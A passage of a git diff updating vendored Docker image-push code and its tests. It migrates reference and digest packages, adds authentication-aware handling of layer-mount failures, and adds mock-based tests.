 	if dependenciesSeen != nil {
 		dependenciesSeen[l.ChainID()] = dependencyImage
 	}
 
-	return imageListForThisTag, dependencyImage, nil
+	return imageListForThisTag, dependencyImage
 }
 
 // createImageIndex returns an index of an image's layer IDs and tags.
@@ -362,8 +356,8 @@ func (p *v1Pusher) pushImageToEndpoint(ctx context.Context, endpoint string, ima
 		}
 		if topImage, isTopImage := img.(*v1TopImage); isTopImage {
 			for _, tag := range tags[topImage.imageID] {
-				progress.Messagef(p.config.ProgressOutput, "", "Pushing tag for rev [%s] on {%s}", stringid.TruncateID(v1ID), endpoint+"repositories/"+p.repoInfo.RemoteName()+"/tags/"+tag)
-				if err := p.session.PushRegistryTag(p.repoInfo, v1ID, tag, endpoint); err != nil {
+				progress.Messagef(p.config.ProgressOutput, "", "Pushing tag for rev [%s] on {%s}", stringid.TruncateID(v1ID), endpoint+"repositories/"+reference.Path(p.repoInfo.Name)+"/tags/"+tag)
+				if err := p.session.PushRegistryTag(p.repoInfo.Name, v1ID, tag, endpoint); err != nil {
 					return err
 				}
 			}
@@ -391,7 +385,7 @@ func (p *v1Pusher) pushRepository(ctx context.Context) error {
 
 	// Register all the images in a repository with the registry
 	// If an image is not in this list it will not be associated with the repository
-	repoData, err := p.session.PushImageJSONIndex(p.repoInfo, imageIndex, false, nil)
+	repoData, err := p.session.PushImageJSONIndex(p.repoInfo.Name, imageIndex, false, nil)
 	if err != nil {
 		return err
 	}
@@ -401,7 +395,7 @@ func (p *v1Pusher) pushRepository(ctx context.Context) error {
 			return err
 		}
 	}
-	_, err = p.session.PushImageJSONIndex(p.repoInfo, imageIndex, true, repoData.Endpoints)
+	_, err = p.session.PushImageJSONIndex(p.repoInfo.Name, imageIndex, true, repoData.Endpoints)
 	return err
 }
 
diff --git a/vendor/github.com/docker/docker/distribution/push_v2.go b/vendor/github.com/docker/docker/distribution/push_v2.go
index 1f8c822fec..9dc3e7a2a6 100644
--- a/vendor/github.com/docker/docker/distribution/push_v2.go
+++ b/vendor/github.com/docker/docker/distribution/push_v2.go
@@ -1,6 +1,7 @@
-package distribution
+package distribution // import "github.com/docker/docker/distribution"
 
 import (
+	"context"
 	"errors"
 	"fmt"
 	"io"
@@ -9,23 +10,22 @@ import (
 	"strings"
 	"sync"
 
-	"golang.org/x/net/context"
-
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/distribution"
-	"github.com/docker/distribution/digest"
 	"github.com/docker/distribution/manifest/schema1"
 	"github.com/docker/distribution/manifest/schema2"
-	distreference "github.com/docker/distribution/reference"
+	"github.com/docker/distribution/reference"
+	"github.com/docker/distribution/registry/api/errcode"
 	"github.com/docker/distribution/registry/client"
+	apitypes "github.com/docker/docker/api/types"
 	"github.com/docker/docker/distribution/metadata"
 	"github.com/docker/docker/distribution/xfer"
 	"github.com/docker/docker/layer"
 	"github.com/docker/docker/pkg/ioutils"
 	"github.com/docker/docker/pkg/progress"
 	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/reference"
 	"github.com/docker/docker/registry"
+	"github.com/opencontainers/go-digest"
+	"github.com/sirupsen/logrus"
 )
 
 const (
@@ -33,15 +33,6 @@ const (
 	middleLayerMaximumSize = 10 * (1 << 20)  // 10MB
 )
 
-// PushResult contains the tag, manifest digest, and manifest size from the
-// push. It's used to signal this information to the trust code in the client
-// so it can sign the manifest if necessary.
-type PushResult struct {
-	Tag    string
-	Digest digest.Digest
-	Size   int
-}
-
 type v2Pusher struct {
 	v2MetadataService metadata.V2MetadataService
 	ref               reference.Named
@@ -64,19 +55,21 @@ type pushState struct {
 	// confirmedV2 is set to true if we confirm we're talking to a v2
 	// registry. This is used to limit fallbacks to the v1 protocol.
 	confirmedV2 bool
+	hasAuthInfo bool
 }
 
 func (p *v2Pusher) Push(ctx context.Context) (err error) {
 	p.pushState.remoteLayers = make(map[layer.DiffID]distribution.Descriptor)
 
 	p.repo, p.pushState.confirmedV2, err = NewV2Repository(ctx, p.repoInfo, p.endpoint, p.config.MetaHeaders, p.config.AuthConfig, "push", "pull")
+	p.pushState.hasAuthInfo = p.config.AuthConfig.RegistryToken != "" || (p.config.AuthConfig.Username != "" && p.config.AuthConfig.Password != "")
 	if err != nil {
 		logrus.Debugf("Error getting v2 registry: %v", err)
 		return err
 	}
 
 	if err = p.pushV2Repository(ctx); err != nil {
-		if continueOnError(err) {
+		if continueOnError(err, p.endpoint.Mirror) {
 			return fallbackError{
 				err:         err,
 				confirmedV2: p.pushState.confirmedV2,
@@ -91,7 +84,7 @@ func (p *v2Pusher) pushV2Repository(ctx context.Context) (err error) {
 	if namedTagged, isNamedTagged := p.ref.(reference.NamedTagged); isNamedTagged {
 		imageID, err := p.config.ReferenceStore.Get(p.ref)
 		if err != nil {
-			return fmt.Errorf("tag does not exist: %s", p.ref.String())
+			return fmt.Errorf("tag does not exist: %s", reference.FamiliarString(p.ref))
 		}
 
 		return p.pushV2Tag(ctx, namedTagged, imageID)
@@ -113,26 +106,31 @@ func (p *v2Pusher) pushV2Repository(ctx context.Context) (err error) {
 	}
 
 	if pushed == 0 {
-		return fmt.Errorf("no tags to push for %s", p.repoInfo.Name())
+		return fmt.Errorf("no tags to push for %s", reference.FamiliarName(p.repoInfo.Name))
 	}
 
 	return nil
 }
 
 func (p *v2Pusher) pushV2Tag(ctx context.Context, ref reference.NamedTagged, id digest.Digest) error {
-	logrus.Debugf("Pushing repository: %s", ref.String())
+	logrus.Debugf("Pushing repository: %s", reference.FamiliarString(ref))
 
 	imgConfig, err := p.config.ImageStore.Get(id)
 	if err != nil {
-		return fmt.Errorf("could not find image from tag %s: %v", ref.String(), err)
+		return fmt.Errorf("could not find image from tag %s: %v", reference.FamiliarString(ref), err)
 	}
 
 	rootfs, err := p.config.ImageStore.RootFSFromConfig(imgConfig)
 	if err != nil {
-		return fmt.Errorf("unable to get rootfs for image %s: %s", ref.String(), err)
+		return fmt.Errorf("unable to get rootfs for image %s: %s", reference.FamiliarString(ref), err)
+	}
+
+	platform, err := p.config.ImageStore.PlatformFromConfig(imgConfig)
+	if err != nil {
+		return fmt.Errorf("unable to get platform for image %s: %s", reference.FamiliarString(ref), err)
 	}
 
-	l, err := p.config.LayerStore.Get(rootfs.ChainID())
+	l, err := p.config.LayerStores[platform.OS].Get(rootfs.ChainID())
 	if err != nil {
 		return fmt.Errorf("failed to get top layer from image: %v", err)
 	}
@@ -148,14 +146,15 @@ func (p *v2Pusher) pushV2Tag(ctx context.Context, ref reference.NamedTagged, id
 	descriptorTemplate := v2PushDescriptor{
 		v2MetadataService: p.v2MetadataService,
 		hmacKey:           hmacKey,
-		repoInfo:          p.repoInfo,
+		repoInfo:          p.repoInfo.Name,
 		ref:               p.ref,
+		endpoint:          p.endpoint,
 		repo:              p.repo,
 		pushState:         &p.pushState,
 	}
 
 	// Loop bounds condition is to avoid pushing the base layer on Windows.
-	for i := 0; i < len(rootfs.DiffIDs); i++ {
+	for range rootfs.DiffIDs {
 		descriptor := descriptorTemplate
 		descriptor.layer = l
 		descriptor.checkedDigests = make(map[digest.Digest]struct{})
@@ -189,7 +188,7 @@ func (p *v2Pusher) pushV2Tag(ctx context.Context, ref reference.NamedTagged, id
 
 		logrus.Warnf("failed to upload schema2 manifest: %v - falling back to schema1", err)
 
-		manifestRef, err := distreference.WithTag(p.repo.Named(), ref.Tag())
+		manifestRef, err := reference.WithTag(p.repo.Named(), ref.Tag())
 		if err != nil {
 			return err
 		}
@@ -225,7 +224,7 @@ func (p *v2Pusher) pushV2Tag(ctx context.Context, ref reference.NamedTagged, id
 
 	// Signal digest to the trust client so it can sign the
 	// push, if appropriate.
-	progress.Aux(p.config.ProgressOutput, PushResult{Tag: ref.Tag(), Digest: manifestDigest, Size: len(canonicalManifest)})
+	progress.Aux(p.config.ProgressOutput, apitypes.PushResult{Tag: ref.Tag(), Digest: manifestDigest.String(), Size: len(canonicalManifest)})
 
 	return nil
 }
@@ -248,6 +247,7 @@ type v2PushDescriptor struct {
 	hmacKey           []byte
 	repoInfo          reference.Named
 	ref               reference.Named
+	endpoint          registry.APIEndpoint
 	repo              distribution.Repository
 	pushState         *pushState
 	remoteDescriptor  distribution.Descriptor
@@ -256,7 +256,7 @@ type v2PushDescriptor struct {
 }
 
 func (pd *v2PushDescriptor) Key() string {
-	return "v2push:" + pd.ref.FullName() + " " + pd.layer.DiffID().String()
+	return "v2push:" + pd.ref.Name() + " " + pd.layer.DiffID().String()
 }
 
 func (pd *v2PushDescriptor) ID() string {
@@ -268,10 +268,13 @@ func (pd *v2PushDescriptor) DiffID() layer.DiffID {
 }
 
 func (pd *v2PushDescriptor) Upload(ctx context.Context, progressOutput progress.Output) (distribution.Descriptor, error) {
-	if fs, ok := pd.layer.(distribution.Describable); ok {
-		if d := fs.Descriptor(); len(d.URLs) > 0 {
-			progress.Update(progressOutput, pd.ID(), "Skipped foreign layer")
-			return d, nil
+	// Skip foreign layers unless this registry allows nondistributable artifacts.
+	if !pd.endpoint.AllowNondistributableArtifacts {
+		if fs, ok := pd.layer.(distribution.Describable); ok {
+			if d := fs.Descriptor(); len(d.URLs) > 0 {
+				progress.Update(progressOutput, pd.ID(), "Skipped foreign layer")
+				return d, nil
+			}
 		}
 	}
 
@@ -292,8 +295,8 @@ func (pd *v2PushDescriptor) Upload(ctx context.Context, progressOutput progress.
 	// Do we have any metadata associated with this layer's DiffID?
 	v2Metadata, err := pd.v2MetadataService.GetMetadata(diffID)
 	if err == nil {
-		// check for blob existence in the target repository if we have a mapping with it
-		descriptor, exists, err := pd.layerAlreadyExists(ctx, progressOutput, diffID, false, 1, v2Metadata)
+		// check for blob existence in the target repository
+		descriptor, exists, err := pd.layerAlreadyExists(ctx, progressOutput, diffID, true, 1, v2Metadata)
 		if exists || err != nil {
 			return descriptor, err
 		}
@@ -307,28 +310,28 @@ func (pd *v2PushDescriptor) Upload(ctx context.Context, progressOutput progress.
 
 	// Attempt to find another repository in the same registry to mount the layer from to avoid an unnecessary upload
 	candidates := getRepositoryMountCandidates(pd.repoInfo, pd.hmacKey, maxMountAttempts, v2Metadata)
+	isUnauthorizedError := false
 	for _, mountCandidate := range candidates {
 		logrus.Debugf("attempting to mount layer %s (%s) from %s", diffID, mountCandidate.Digest, mountCandidate.SourceRepository)
 		createOpts := []distribution.BlobCreateOption{}
 
 		if len(mountCandidate.SourceRepository) > 0 {
-			namedRef, err := reference.WithName(mountCandidate.SourceRepository)
+			namedRef, err := reference.ParseNormalizedNamed(mountCandidate.SourceRepository)
 			if err != nil {
-				logrus.Errorf("failed to parse source repository reference %v: %v", namedRef.String(), err)
+				logrus.Errorf("failed to parse source repository reference %v: %v", reference.FamiliarString(namedRef), err)
 				pd.v2MetadataService.Remove(mountCandidate)
 				continue
 			}
 
-			// TODO (brianbland): We need to construct a reference where the Name is
-			// only the full remote name, so clean this up when distribution has a
-			// richer reference package
-			remoteRef, err := distreference.WithName(namedRef.RemoteName())
+			// Candidates are always under same domain, create remote reference
+			// with only path to set mount from with
+			remoteRef, err := reference.WithName(reference.Path(namedRef))
 			if err != nil {
-				logrus.Errorf("failed to make remote reference out of %q: %v", namedRef.RemoteName(), namedRef.RemoteName())
+				logrus.Errorf("failed to make remote reference out of %q: %v", reference.Path(namedRef), err)
 				continue
 			}
 
-			canonicalRef, err := distreference.WithDigest(distreference.TrimNamed(remoteRef), mountCandidate.Digest)
+			canonicalRef, err := reference.WithDigest(reference.TrimNamed(remoteRef), mountCandidate.Digest)
 			if err != nil {
 				logrus.Errorf("failed to make canonical reference: %v", err)
 				continue
@@ -355,16 +358,31 @@ func (pd *v2PushDescriptor) Upload(ctx context.Context, progressOutput progress.
 			// Cache mapping from this layer's DiffID to the blobsum
 			if err := pd.v2MetadataService.TagAndAdd(diffID, pd.hmacKey, metadata.V2Metadata{
 				Digest:           err.Descriptor.Digest,
-				SourceRepository: pd.repoInfo.FullName(),
+				SourceRepository: pd.repoInfo.Name(),
 			}); err != nil {
 				return distribution.Descriptor{}, xfer.DoNotRetry{Err: err}
 			}
 			return err.Descriptor, nil
+		case errcode.Errors:
+			for _, e := range err {
+				switch e := e.(type) {
+				case errcode.Error:
+					if e.Code == errcode.ErrorCodeUnauthorized {
+						// when unauthorized error that indicate user don't has right to push layer to register
+						logrus.Debugln("failed to push layer to registry because unauthorized error")
+						isUnauthorizedError = true
+					}
+				default:
+				}
+			}
 		default:
 			logrus.Infof("failed to mount layer %s (%s) from %s: %v", diffID, mountCandidate.Digest, mountCandidate.SourceRepository, err)
 		}
 
+		// when error is unauthorizedError and user don't hasAuthInfo that's the case user don't has right to push layer to register
+		// and he hasn't login either, in this case candidate cache should be removed
 		if len(mountCandidate.SourceRepository) > 0 &&
+			!(isUnauthorizedError && !pd.pushState.hasAuthInfo) &&
 			(metadata.CheckV2MetadataHMAC(&mountCandidate, pd.hmacKey) ||
 				len(mountCandidate.HMAC) == 0) {
 			cause := "blob mount failure"
@@ -398,14 +416,8 @@ func (pd *v2PushDescriptor) Upload(ctx context.Context, progressOutput progress.
 		}
 	}
 	defer layerUpload.Close()
-
 	// upload the blob
-	desc, err := pd.uploadUsingSession(ctx, progressOutput, diffID, layerUpload)
-	if err != nil {
-		return desc, err
-	}
-
-	return desc, nil
+	return pd.uploadUsingSession(ctx, progressOutput, diffID, layerUpload)
 }
 
 func (pd *v2PushDescriptor) SetRemoteDescriptor(descriptor distribution.Descriptor) {
@@ -425,6 +437,10 @@ func (pd *v2PushDescriptor) uploadUsingSession(
 	var reader io.ReadCloser
 
 	contentReader, err := pd.layer.Open()
+	if err != nil {
+		return distribution.Descriptor{}, retryOnError(err)
+	}
+
 	size, _ := pd.layer.Size()
 
 	reader = progress.NewProgressReader(ioutils.NewCancelReadCloser(ctx, contentReader), progressOutput, size, pd.ID(), "Pushing")
@@ -443,7 +459,7 @@ func (pd *v2PushDescriptor) uploadUsingSession(
 		return distribution.Descriptor{}, fmt.Errorf("unsupported layer media type %s", m)
 	}
 
-	digester := digest.Canonical.New()
+	digester := digest.Canonical.Digester()
 	tee := io.TeeReader(reader, digester.Hash())
 
 	nn, err := layerUpload.ReadFrom(tee)
@@ -463,7 +479,7 @@ func (pd *v2PushDescriptor) uploadUsingSession(
 	// Cache mapping from this layer's DiffID to the blobsum
 	if err := pd.v2MetadataService.TagAndAdd(diffID, pd.hmacKey, metadata.V2Metadata{
 		Digest:           pushDigest,
-		SourceRepository: pd.repoInfo.FullName(),
+		SourceRepository: pd.repoInfo.Name(),
 	}); err != nil {
 		return distribution.Descriptor{}, xfer.DoNotRetry{Err: err}
 	}
@@ -498,7 +514,7 @@ func (pd *v2PushDescriptor) layerAlreadyExists(
 	// filter the metadata
 	candidates := []metadata.V2Metadata{}
 	for _, meta := range v2Metadata {
-		if len(meta.SourceRepository) > 0 && !checkOtherRepositories && meta.SourceRepository != pd.repoInfo.FullName() {
+		if len(meta.SourceRepository) > 0 && !checkOtherRepositories && meta.SourceRepository != pd.repoInfo.Name() {
 			continue
 		}
 		candidates = append(candidates, meta)
@@ -529,16 +545,16 @@ func (pd *v2PushDescriptor) layerAlreadyExists(
 attempts:
 	for _, dgst := range layerDigests {
 		meta := digestToMetadata[dgst]
-		logrus.Debugf("Checking for presence of layer %s (%s) in %s", diffID, dgst, pd.repoInfo.FullName())
+		logrus.Debugf("Checking for presence of layer %s (%s) in %s", diffID, dgst, pd.repoInfo.Name())
 		desc, err = pd.repo.Blobs(ctx).Stat(ctx, dgst)
 		pd.checkedDigests[meta.Digest] = struct{}{}
 		switch err {
 		case nil:
-			if m, ok := digestToMetadata[desc.Digest]; !ok || m.SourceRepository != pd.repoInfo.FullName() || !metadata.CheckV2MetadataHMAC(m, pd.hmacKey) {
+			if m, ok := digestToMetadata[desc.Digest]; !ok || m.SourceRepository != pd.repoInfo.Name() || !metadata.CheckV2MetadataHMAC(m, pd.hmacKey) {
 				// cache mapping from this layer's DiffID to the blobsum
 				if err := pd.v2MetadataService.TagAndAdd(diffID, pd.hmacKey, metadata.V2Metadata{
 					Digest:           desc.Digest,
-					SourceRepository: pd.repoInfo.FullName(),
+					SourceRepository: pd.repoInfo.Name(),
 				}); err != nil {
 					return distribution.Descriptor{}, false, xfer.DoNotRetry{Err: err}
 				}
@@ -547,12 +563,12 @@ attempts:
 			exists = true
 			break attempts
 		case distribution.ErrBlobUnknown:
-			if meta.SourceRepository == pd.repoInfo.FullName() {
+			if meta.SourceRepository == pd.repoInfo.Name() {
 				// remove the mapping to the target repository
 				pd.v2MetadataService.Remove(*meta)
 			}
 		default:
-			logrus.WithError(err).Debugf("Failed to check for presence of layer %s (%s) in %s", diffID, dgst, pd.repoInfo.FullName())
+			logrus.WithError(err).Debugf("Failed to check for presence of layer %s (%s) in %s", diffID, dgst, pd.repoInfo.Name())
 		}
 	}
 
@@ -595,7 +611,7 @@ func getMaxMountAndExistenceCheckAttempts(layer PushLayer) (maxMountAttempts, ma
 }
 
 // getRepositoryMountCandidates returns an array of v2 metadata items belonging to the given registry. The
-// array is sorted from youngest to oldest. If requireReigstryMatch is true, the resulting array will contain
+// array is sorted from youngest to oldest. If requireRegistryMatch is true, the resulting array will contain
 // only metadata entries having registry part of SourceRepository matching the part of repoInfo.
 func getRepositoryMountCandidates(
 	repoInfo reference.Named,
@@ -606,11 +622,11 @@ func getRepositoryMountCandidates(
 	candidates := []metadata.V2Metadata{}
 	for _, meta := range v2Metadata {
 		sourceRepo, err := reference.ParseNamed(meta.SourceRepository)
-		if err != nil || repoInfo.Hostname() != sourceRepo.Hostname() {
+		if err != nil || reference.Domain(repoInfo) != reference.Domain(sourceRepo) {
 			continue
 		}
 		// target repository is not a viable candidate
-		if meta.SourceRepository == repoInfo.FullName() {
+		if meta.SourceRepository == repoInfo.Name() {
 			continue
 		}
 		candidates = append(candidates, meta)
@@ -652,6 +668,7 @@ func (bla byLikeness) Swap(i, j int) {
 }
 func (bla byLikeness) Len() int { return len(bla.arr) }
 
+// nolint: interfacer
 func sortV2MetadataByLikenessAndAge(repoInfo reference.Named, hmacKey []byte, marr []metadata.V2Metadata) {
 	// reverse the metadata array to shift the newest entries to the beginning
 	for i := 0; i < len(marr)/2; i++ {
@@ -661,7 +678,7 @@ func sortV2MetadataByLikenessAndAge(repoInfo reference.Named, hmacKey []byte, ma
 	sort.Stable(byLikeness{
 		arr:            marr,
 		hmacKey:        hmacKey,
-		pathComponents: getPathComponents(repoInfo.FullName()),
+		pathComponents: getPathComponents(repoInfo.Name()),
 	})
 }
 
@@ -678,11 +695,6 @@ func numOfMatchingPathComponents(pth string, matchComponents []string) int {
 }
 
 func getPathComponents(path string) []string {
-	// make sure to add docker.io/ prefix to the path
-	named, err := reference.ParseNamed(path)
-	if err == nil {
-		path = named.FullName()
-	}
 	return strings.Split(path, "/")
 }
 
diff --git a/vendor/github.com/docker/docker/distribution/push_v2_test.go b/vendor/github.com/docker/docker/distribution/push_v2_test.go
index 6a5216b1d0..436b4a1797 100644
--- a/vendor/github.com/docker/docker/distribution/push_v2_test.go
+++ b/vendor/github.com/docker/docker/distribution/push_v2_test.go
@@ -1,19 +1,23 @@
-package distribution
+package distribution // import "github.com/docker/docker/distribution"
 
 import (
+	"context"
 	"net/http"
+	"net/url"
 	"reflect"
 	"testing"
 
 	"github.com/docker/distribution"
-	"github.com/docker/distribution/context"
-	"github.com/docker/distribution/digest"
 	"github.com/docker/distribution/manifest/schema2"
-	distreference "github.com/docker/distribution/reference"
+	"github.com/docker/distribution/reference"
+	"github.com/docker/distribution/registry/api/errcode"
+	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/distribution/metadata"
 	"github.com/docker/docker/layer"
 	"github.com/docker/docker/pkg/progress"
-	"github.com/docker/docker/reference"
+	refstore "github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+	"github.com/opencontainers/go-digest"
 )
 
 func TestGetRepositoryMountCandidates(t *testing.T) {
@@ -43,8 +47,8 @@ func TestGetRepositoryMountCandidates(t *testing.T) {
 			name:          "one item matching",
 			targetRepo:    "busybox",
 			maxCandidates: -1,
-			metadata:      []metadata.V2Metadata{taggedMetadata("hash", "1", "hello-world")},
-			candidates:    []metadata.V2Metadata{taggedMetadata("hash", "1", "hello-world")},
+			metadata:      []metadata.V2Metadata{taggedMetadata("hash", "1", "docker.io/library/hello-world")},
+			candidates:    []metadata.V2Metadata{taggedMetadata("hash", "1", "docker.io/library/hello-world")},
 		},
 		{
 			name:          "allow missing SourceRepository",
@@ -63,13 +67,13 @@ func TestGetRepositoryMountCandidates(t *testing.T) {
 			maxCandidates: -1,
 			metadata: []metadata.V2Metadata{
 				{Digest: digest.Digest("1"), SourceRepository: "docker.io/user/foo"},
-				{Digest: digest.Digest("3"), SourceRepository: "user/bar"},
-				{Digest: digest.Digest("2"), SourceRepository: "app"},
+				{Digest: digest.Digest("3"), SourceRepository: "docker.io/user/bar"},
+				{Digest: digest.Digest("2"), SourceRepository: "docker.io/library/app"},
 			},
 			candidates: []metadata.V2Metadata{
-				{Digest: digest.Digest("3"), SourceRepository: "user/bar"},
+				{Digest: digest.Digest("3"), SourceRepository: "docker.io/user/bar"},
 				{Digest: digest.Digest("1"), SourceRepository: "docker.io/user/foo"},
-				{Digest: digest.Digest("2"), SourceRepository: "app"},
+				{Digest: digest.Digest("2"), SourceRepository: "docker.io/library/app"},
 			},
 		},
 		{
@@ -78,10 +82,10 @@ func TestGetRepositoryMountCandidates(t *testing.T) {
 			targetRepo:    "127.0.0.1/foo/bar",
 			maxCandidates: -1,
 			metadata: []metadata.V2Metadata{
-				taggedMetadata("hash", "1", "hello-world"),
+				taggedMetadata("hash", "1", "docker.io/library/hello-world"),
 				taggedMetadata("efgh", "2", "127.0.0.1/hello-world"),
-				taggedMetadata("abcd", "3", "busybox"),
-				taggedMetadata("hash", "4", "busybox"),
+				taggedMetadata("abcd", "3", "docker.io/library/busybox"),
+				taggedMetadata("hash", "4", "docker.io/library/busybox"),
 				taggedMetadata("hash", "5", "127.0.0.1/foo"),
 				taggedMetadata("hash", "6", "127.0.0.1/bar"),
 				taggedMetadata("efgh", "7", "127.0.0.1/foo/bar"),
@@ -105,23 +109,25 @@ func TestGetRepositoryMountCandidates(t *testing.T) {
 			targetRepo:    "user/app",
 			maxCandidates: 3,
 			metadata: []metadata.V2Metadata{
-				taggedMetadata("abcd", "1", "user/app1"),
-				taggedMetadata("abcd", "2", "user/app/base"),
-				taggedMetadata("hash", "3", "user/app"),
+				taggedMetadata("abcd", "1", "docker.io/user/app1"),
+				taggedMetadata("abcd", "2", "docker.io/user/app/base"),
+				taggedMetadata("hash", "3", "docker.io/user/app"),
 				taggedMetadata("abcd", "4", "127.0.0.1/user/app"),
-				taggedMetadata("hash", "5", "user/foo"),
-				taggedMetadata("hash", "6", "app/bar"),
+				taggedMetadata("hash", "5", "docker.io/user/foo"),
+				taggedMetadata("hash", "6", "docker.io/app/bar"),
 			},
 			candidates: []metadata.V2Metadata{
 				// first by matching hash
-				taggedMetadata("abcd", "2", "user/app/base"),
-				taggedMetadata("abcd", "1", "user/app1"),
+				taggedMetadata("abcd", "2", "docker.io/user/app/base"),
+				taggedMetadata("abcd", "1", "docker.io/user/app1"),
 				// then by longest matching prefix
-				taggedMetadata("hash", "3", "user/app"),
+				// "docker.io/usr/app" is excluded since candidates must
+				// be from a different repository
+				taggedMetadata("hash", "5", "docker.io/user/foo"),
 			},
 		},
 	} {
-		repoInfo, err := reference.ParseNamed(tc.targetRepo)
+		repoInfo, err := reference.ParseNormalizedNamed(tc.targetRepo)
 		if err != nil {
 			t.Fatalf("[%s] failed to parse reference name: %v", tc.name, err)
 		}
@@ -184,7 +190,7 @@ func TestLayerAlreadyExists(t *testing.T) {
 			expectedRequests:   []string{"apple"},
 		},
 		{
-			name:               "not matching reposies",
+			name:               "not matching repositories",
 			targetRepo:         "busybox",
 			maxExistenceChecks: 3,
 			metadata: []metadata.V2Metadata{
@@ -202,12 +208,15 @@ func TestLayerAlreadyExists(t *testing.T) {
 			checkOtherRepositories: true,
 			metadata: []metadata.V2Metadata{
 				{Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/hello-world"},
-				{Digest: digest.Digest("orange"), SourceRepository: "docker.io/library/busybox/subapp"},
+				{Digest: digest.Digest("orange"), SourceRepository: "docker.io/busybox/subapp"},
 				{Digest: digest.Digest("pear"), SourceRepository: "docker.io/busybox"},
-				{Digest: digest.Digest("plum"), SourceRepository: "busybox"},
+				{Digest: digest.Digest("plum"), SourceRepository: "docker.io/library/busybox"},
 				{Digest: digest.Digest("banana"), SourceRepository: "127.0.0.1/busybox"},
 			},
-			expectedRequests: []string{"plum", "pear", "apple", "orange", "banana"},
+			expectedRequests: []string{"plum", "apple", "pear", "orange", "banana"},
+			expectedRemovals: []metadata.V2Metadata{
+				{Digest: digest.Digest("plum"), SourceRepository: "docker.io/library/busybox"},
+			},
 		},
 		{
 			name:               "find existing blob",
@@ -374,7 +383,7 @@ func TestLayerAlreadyExists(t *testing.T) {
 			},
 		},
 	} {
-		repoInfo, err := reference.ParseNamed(tc.targetRepo)
+		repoInfo, err := reference.ParseNormalizedNamed(tc.targetRepo)
 		if err != nil {
 			t.Fatalf("[%s] failed to parse reference name: %v", tc.name, err)
 		}
@@ -457,6 +466,158 @@ func TestLayerAlreadyExists(t *testing.T) {
 	}
 }
 
+type mockReferenceStore struct {
+}
+
+func (s *mockReferenceStore) References(id digest.Digest) []reference.Named {
+	return []reference.Named{}
+}
+func (s *mockReferenceStore) ReferencesByName(ref reference.Named) []refstore.Association {
+	return []refstore.Association{}
+}
+func (s *mockReferenceStore) AddTag(ref reference.Named, id digest.Digest, force bool) error {
+	return nil
+}
+func (s *mockReferenceStore) AddDigest(ref reference.Canonical, id digest.Digest, force bool) error {
+	return nil
+}
+func (s *mockReferenceStore) Delete(ref reference.Named) (bool, error) {
+	return true, nil
+}
+func (s *mockReferenceStore) Get(ref reference.Named) (digest.Digest, error) {
+	return "", nil
+}
+
+func TestWhenEmptyAuthConfig(t *testing.T) {
+	for _, authInfo := range []struct {
+		username      string
+		password      string
+		registryToken string
+		expected      bool
+	}{
+		{
+			username:      "",
+			password:      "",
+			registryToken: "",
+			expected:      false,
+		},
+		{
+			username:      "username",
+			password:      "password",
+			registryToken: "",
+			expected:      true,
+		},
+		{
+			username:      "",
+			password:      "",
+			registryToken: "token",
+			expected:      true,
+		},
+	} {
+		imagePushConfig := &ImagePushConfig{}
+		imagePushConfig.AuthConfig = &types.AuthConfig{
+			Username:      authInfo.username,
+			Password:      authInfo.password,
+			RegistryToken: authInfo.registryToken,
+		}
+		imagePushConfig.ReferenceStore = &mockReferenceStore{}
+		repoInfo, _ := reference.ParseNormalizedNamed("xujihui1985/test.img")
+		pusher := &v2Pusher{
+			config: imagePushConfig,
+			repoInfo: &registry.RepositoryInfo{
+				Name: repoInfo,
+			},
+			endpoint: registry.APIEndpoint{
+				URL: &url.URL{
+					Scheme: "https",
+					Host:   "index.docker.io",
+				},
+				Version:      registry.APIVersion1,
+				TrimHostname: true,
+			},
+		}
+		pusher.Push(context.Background())
+		if pusher.pushState.hasAuthInfo != authInfo.expected {
+			t.Errorf("hasAuthInfo does not match expected: %t != %t", authInfo.expected, pusher.pushState.hasAuthInfo)
+		}
+	}
+}
+
+type mockBlobStoreWithCreate struct {
+	mockBlobStore
+	repo *mockRepoWithBlob
+}
+
+func (blob *mockBlobStoreWithCreate) Create(ctx context.Context, options ...distribution.BlobCreateOption) (distribution.BlobWriter, error) {
+	return nil, errcode.Errors(append([]error{errcode.ErrorCodeUnauthorized.WithMessage("unauthorized")}))
+}
+
+type mockRepoWithBlob struct {
+	mockRepo
+}
+
+func (m *mockRepoWithBlob) Blobs(ctx context.Context) distribution.BlobStore {
+	blob := &mockBlobStoreWithCreate{}
+	blob.mockBlobStore.repo = &m.mockRepo
+	blob.repo = m
+	return blob
+}
+
+type mockMetadataService struct {
+	mockV2MetadataService
+}
+
+func (m *mockMetadataService) GetMetadata(diffID layer.DiffID) ([]metadata.V2Metadata, error) {
+	return []metadata.V2Metadata{
+		taggedMetadata("abcd", "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e28", "docker.io/user/app1"),
+		taggedMetadata("abcd", "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e22", "docker.io/user/app/base"),
+		taggedMetadata("hash", "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e23", "docker.io/user/app"),
+		taggedMetadata("abcd", "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e24", "127.0.0.1/user/app"),
+		taggedMetadata("hash", "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e25", "docker.io/user/foo"),
+		taggedMetadata("hash", "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e26", "docker.io/app/bar"),
+	}, nil
+}
+
+var removeMetadata bool
+
+func (m *mockMetadataService) Remove(metadata metadata.V2Metadata) error {
+	removeMetadata = true
+	return nil
+}
+
+func TestPushRegistryWhenAuthInfoEmpty(t *testing.T) {
+	repoInfo, _ := reference.ParseNormalizedNamed("user/app")
+	ms := &mockMetadataService{}
+	remoteErrors := map[digest.Digest]error{digest.Digest("sha256:apple"): distribution.ErrAccessDenied}
+	remoteBlobs := map[digest.Digest]distribution.Descriptor{digest.Digest("sha256:apple"): {Digest: digest.Digest("shar256:apple")}}
+	repo := &mockRepoWithBlob{
+		mockRepo: mockRepo{
+			t:        t,
+			errors:   remoteErrors,
+			blobs:    remoteBlobs,
+			requests: []string{},
+		},
+	}
+	pd := &v2PushDescriptor{
+		hmacKey:  []byte("abcd"),
